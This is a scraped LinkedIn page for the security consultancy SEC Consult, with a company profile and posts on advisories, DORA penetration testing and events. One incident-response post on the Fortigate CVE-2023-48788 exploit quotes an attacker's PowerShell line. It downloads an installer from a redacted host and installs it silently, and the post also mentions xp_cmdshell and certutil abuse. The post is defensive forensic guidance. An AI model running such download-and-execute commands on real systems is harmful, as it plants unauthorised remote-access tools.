SEC Consult Group

SEC Consult Group

IT-Dienstleistungen und IT-Beratung

Leading specialist in Application & Cybersecurity. SEC Consult is part of Eviden, an Atos business.

Info

SEC Consult is one of the leading consultancies in the area of cyber and application security. SEC Consult’s customers include government agencies, international organizations and leading companies from various industries of the private sector as well as critical infrastructure. The company is certified in accordance with ISO 27001 as well as CREST at several locations. SEC Consult is part of Eviden. https://www.linkedin.com/company/eviden/ Our services: • External and internal security audits • Security certification for web applications (ÖNORM A 7700) • Security audits of (standard) software applications (incl. Security Source Code Review) • Evaluation of the security issues surrounding software acquisition • Support for secure software development • Selection and evaluation of security products • Definition of security management processes (ISO 27001, GSHB) • Optimization of security organizations, processes and policies • Creation and optimization of risk management models for information security • Forensic analysis • Simulation of a real attack • Integrate manual security reviews into your development process Vienna | Linz | St.Pölten | Wr. Neustadt Berlin | Munich | Bochum | Nuremberg Zurich | Singapore | Bangkok | Kuala Lumpur

Website
https://www.sec-consult.com
Branche
IT-Dienstleistungen und IT-Beratung
Größe
201–500 Beschäftigte
Hauptsitz
Vienna
Art
Privatunternehmen
Gegründet
2002
Spezialgebiete
Application Security Management, Information Security, IT-Security, Penetrationtesting, Managed Security Services und Security Organisation and Processes

Orte

Beschäftigte von SEC Consult Group

Updates

  • 🎄✨ Merry Christmas from SEC Consult! ✨🎄 As we celebrate the season of joy and togetherness, we want to thank all our clients, partners, and friends for trusting us to secure what matters to them. 🛡️🔒 May your holiday be filled with happiness, peace, and - of course - cybersecurity! 🖥️❄️ Stay safe online and offline! Here’s to a brighter, safer, and even more secure 2025! 🚀🎉 #MerryChristmas #HappyHolidays #CyberSafe

    • Kein Alt-Text für dieses Bild vorhanden
  • 🚨 One Month to Go! 🚨 The Digital Operational Resilience Act (DORA) comes into force in just 1 month! Are you ready? 📅 In our latest blog post, we dive into the importance of integrating Threat-Led Penetration Testing (#TLPT) 🕵️♂️ into your ICT risk management framework and Digital Operational Resilience strategy. 🔍 Key Highlights: ✅ DORA introduces the Digital Operational Resilience Testing Framework. ✅ Two main types of security testing: 1️⃣ Security testing for ICT systems supporting critical functions. 2️⃣ Advanced Threat-Led Penetration Testing (TLPT) to strengthen resilience. In this analysis, we break down the critical role of TLPT and what it means for your organization's security posture. 🔐 📝 Read more here: https://lnkd.in/dGUkRrnA #DORA #CyberResilience #TLPT #ThreatTesting #ICTSecurity #DigitalResilience #PenetrationTesting #Compliance #CyberSecurity

    TLPT in the Financial Sector Under DORA: Assessing the Current Status of TIBER

    TLPT in the Financial Sector Under DORA: Assessing the Current Status of TIBER

    sec-consult.com

  • 🚨 Incident Response: Lessons Learned from the Frontlines 🚨 In the ever-evolving world of cyber threats, adaptability and teamwork are 🔑. At SEC Defence, we're constantly refining our strategies to tackle unique challenges. 🛡️ Recently, we faced a particularly intriguing ransomware case that taught us some invaluable lessons. 💡 To share these insights, our colleague Ivan Boranijasevic interviewed Michael Popovtschak, the incident lead at SEC Consult Group, who expertly navigated the case. 🤝 Their discussion highlights the power of collaboration and shared experiences in staying ahead of emerging threats. 🔗 Read more about this fascinating case and the lessons learned in our latest blog post: https://lnkd.in/gRzaNTRh #CyberSecurity #IncidentResponse #Ransomware #teamsecconsult

    Inside an Active Intrusion: Exclusive Interview with the Incident Manager

    Inside an Active Intrusion: Exclusive Interview with the Incident Manager

    sec-consult.com

  • 🚨 SEC Consult Identifies Critical Security Issues in High-End Network Scanners 🚨 We are announcing the results of the extensive security analysis Daniel 🦌 Hirschberger ⛰️ and Tobias Niemann on Image Access GmbH' Scan2Net platform, used in their premium WideTEK and Bookeye scanners. While these products promise unparalleled performance and high security, our findings revealed a different picture. 💡Advisory: https://lnkd.in/dcWpiqg6 Summary: 🔒 Our team discovered 14 critical vulnerabilities affecting firmware versions ≤7.42, including: 👉 OS Command Injection (RCE) 👉 Privilege Escalation 👉 Cross-Site Scripting (XSS) 👉 SQL Injection 👉 Hardcoded Credentials ❗This case underlines the importance of robust security practices and reflects the rising expectations under the Cyber Resilience Act. It’s a wake-up call for vendors to prioritize security as much as innovation to protect the networks of customers, e.g. within public authorities or critical infrastructure.   Next Steps: 📝 If you use Scan2Net devices, update immediately to firmware 7.42B and check the vendor’s support page for future updates 📝 Ensure that the Scan2Net devices are not reachable over the Internet and restrict internal access as much as possible 📝 Vendors: Interested in a security review or need help navigating compliance requirements such as #CRA or #NIS2? Let our experts assist you. Let’s work together to ensure a safer digital future! #CyberSecurity #IoTSecurity #CyberResilienceAct #CRA

    Multiple Critical Vulnerabilities in Image Access Scan2Net

    Multiple Critical Vulnerabilities in Image Access Scan2Net

    sec-consult.com

  • Security Advisory: Stored Cross-Site Scripting Vulnerability in Omada Identity (CVE-2024-52951) 🚨 https://lnkd.in/gQatfpKc A stored cross-site scripting (#XSS) vulnerability was identified by Daniel 🦌 Hirschberger ⛰️ in Omada Identity, a popular enterprise-ready Identity Governance and Administration (IGA) solution. This issue allows authenticated users to execute arbitrary JavaScript in the browsers of other users who view manipulated "History" entries, potentially exposing higher-privileged users to phishing or other malicious activities. 🤨 What Happened?    • An authenticated user could inject malicious JavaScript into the "Request Reason" field of an access request.    • When another user (e.g., a manager reviewing the request) views the request history, the script executes in their browser. 🚦 Impact: The vulnerability can be exploited to target privileged users, enabling attackers to:    • Perform phishing attacks.    • Execute arbitrary JavaScript for data theft or further privilege escalation attacks. 🚨Affected Versions    • Users of v14.14 or lower should apply Hotfix #309.    • Upgrading to v15U1 is strongly recommended. 🚨 Vendor Response Timeline Omada has acknowledged and addressed this issue with a coordinated response. Hotfixes and updates have been released. Special thanks to their team for their cooperation! #CVD 🛟What should you do?    1. Upgrade to version v15U1 if possible.    2. If upgrading is not feasible, apply Hotfix #309 for version v14.14.    3. Conduct a thorough security review of your Omada Identity implementation to identify any additional vulnerabilities or configuration issues. Organizations using Omada Identity should immediately patch their installations and implement routine security reviews to minimize risks. For full details and proof of concept, take a look at our technical security advisory. 💡 Stay secure and vigilant. Proactive updates save organizations from reactive crises! #CyberSecurity #Vulnerability #XSS #InfoSec

    Stored Cross-Site Scripting in Omada Identity

    Stored Cross-Site Scripting in Omada Identity

    sec-consult.com

  • [Event] 🌥️ Cloudy with a Chance of DORA 🌩️ 📢 Live Hacking a Cloud Infrastructure – Free Webinar 🚀 📅 Date: December 5, 2024 ⏰ Time: 10:00 - 11:00 (CET) 📍 Language: German What’s in store: ✅ How DORA impacts cloud operations ✅ A deep dive into cloud penetration testing ✅ Key responsibilities for cloud security ✅ Live hacking demo: See how attackers could steal sensitive bank customer data! Meet your expert: 🧑💻 Moritz Gruber – Team Lead Offensive Security, SEC Consult Germany 🔗 Save your spot now: https://lnkd.in/dUGY5XwG 📌 Don’t miss out—level up your cloud security knowledge today! #DORA #CyberSecurity #CloudSecurity

    • Kein Alt-Text für dieses Bild vorhanden
  • 💻 Debunking Cloud Security Myths: Are You Putting Your Business at Risk? Two common myths could jeopardize your company's cloud safety: ☁️ "The provider takes care of all data security in the cloud." 🔍 "A cloud security scanner finds all vulnerabilities—no need for a penetration test!" These misconceptions can leave your organization vulnerable. Our latest blog post dives deep into these myths, explains their risks, and helps you understand what’s truly needed for cloud security. 👉 Read now to secure your business in the cloud: https://lnkd.in/dqsJN9h2 At SEC Consult, we help you uncover hidden vulnerabilities with tailored cloud penetration tests and expert guidance. Let’s make your cloud environment truly secure. 🛡 #CloudSecurity #CyberSecurity

    Debunking Cloud Security Myths: Clearing Misconceptions That Risk Your Business

    Debunking Cloud Security Myths: Clearing Misconceptions That Risk Your Business

    sec-consult.com

  • 📋 Stefan Viehböck and Constantin Schieber-Knöbl identified vulnerabilitites in Siemens Communication Elements CPCX26 (CP-2016, CP-2019) and SM-2558 Protocol Element 🚨 Webserver vulnerability: A buffer overflow vulnerability was discovered in the HTTP header parsing of the affected devices. 🚨 JTAG interface: Full access to the Zynq-7000 JTAG interface is possible on the SM-2558. 🔧 Fix status: The SM-2558 hardware is end-of-life (EOL) and will not receive a new HW revision. For these, we recommend assessing the need for mitigation or replacement. 👉 Full details and recommendations are available here: https://lnkd.in/d75ScFZ3 Staying informed is the first step to staying secure.

    Profil von Stefan Viehböck anzeigen, Grafik

    Principal Security Consultant at SEC Consult Unternehmensberatung GmbH

    Our electric grid depends on robust, purpose-built substation automation and telecontrol solutions like Siemens SICAM RTUs to ensure reliable and seamless operation. During an in-depth assessment for one of our customers, we identified critical vulnerabilities in devices within the Siemens SICAM solution. These included an unauthenticated buffer overflow vulnerability in a webserver running in a custom RTOS. Further investigation revealed hardware-level security issues that could allow attackers with physical access to compromise the Xilinx/AMD Zynq FPGA. We collaborated closely with Siemens ProductCERT to address these issues. As a result, Siemens has released updated firmware for all affected products. However, the hardware security vulnerabilities cannot be resolved through firmware updates alone, making it essential for affected organizations to implement additional mitigation measures. This highlights the need for rigorous penetration testing by vendors, robust supply chain security testing, and ongoing collaboration across the energy sector to ensure the security and resilience of our critical infrastructure. #CyberSecurity #EnergySector #CriticalInfrastructure #PenetrationTesting #SupplyChainSecurity #teamsecconsult

    • Siemens SICAM AK 3 (YT yaji chinnam)
    • Siemens SICAM SM-2558
    • JTAG debugger
  • 🚨 #CyberSecurity Insight 🚨 Fortigate Exploit (CVE-2023-48788): What Traces Did It Leave? 🚨 In a recent investigation of this exploit, we uncovered critical indicators that attackers left behind on affected hosts. Here's what we found: 💡 Two attack variants were used: 1️⃣ MSSQL Eventlogs (MSSQL$FCEMS): Look for xp_cmdshell (EventID 15457). 2️⃣ PowerShell Logs (EventID 600): Observed commands downloading and installing Splashtop: HostApplication=powershell iwr -uri http://[redacted]/setup.msi -outfile C:\Windows\Temp\[redacted].msi ; msiexec /i C:\Windows\Temp\[redacted].msi /Qn 3️⃣ Certutil Activity: In another variant, attackers used certutil to deploy ScreenConnect (aka ConnectWise), leaving traces in MSSQL$FCEMS. ⚙ When Sysmon is installed: EventID 1 (Process Creation) and EventID 11 (File Creation) provided even more details on the attack's execution. 🔍 Key Takeaway: Regularly monitoring your logs and having tools like Sysmon in place can make all the difference in detecting and mitigating such threats. ➡️ If you’d like a proactive health check or assistance during an active attack, don’t hesitate to reach out to our experts directly. Our SEC Defence team is available 24/7 through our emergency hotline: https://lnkd.in/ekUqPnv 🇩🇪 Germany +49 30 398 2027 77 🇦🇹 Austria +43 1 890 30 43 7777 🇨🇭 Switzerland +41 44 545 10 85

    • Kein Alt-Text für dieses Bild vorhanden
  • We’re happy to announce that we’ll be attending BSides Vienna tomorrow! 🎉 📍 Location: Urania Dachsaal, Uraniastraße 1, 1010 Vienna 👨💻 Don’t miss our very own Timo Longin, Senior Security Consultant at SEC Consult, delivering his talk: "SMTP Smuggling Revisited – Still Spoofing E-mails Worldwide?!" 📅 When: 23.11, 14:10–14:40 📍 Where: Track 1 (Dachsaal) 🌍 BSides is a global series of community-driven events that promote independent security research, education, and collaboration. Whether you're here for the talks, workshops, or the amazing people, BSides Vienna is the place to be. Let’s meet, learn, and push the boundaries of security research together. See you there! 👾 #BSidesVienna #Cybersecurity #InfosecCommunity #Networking

    • Kein Alt-Text für dieses Bild vorhanden

Ähnliche Seiten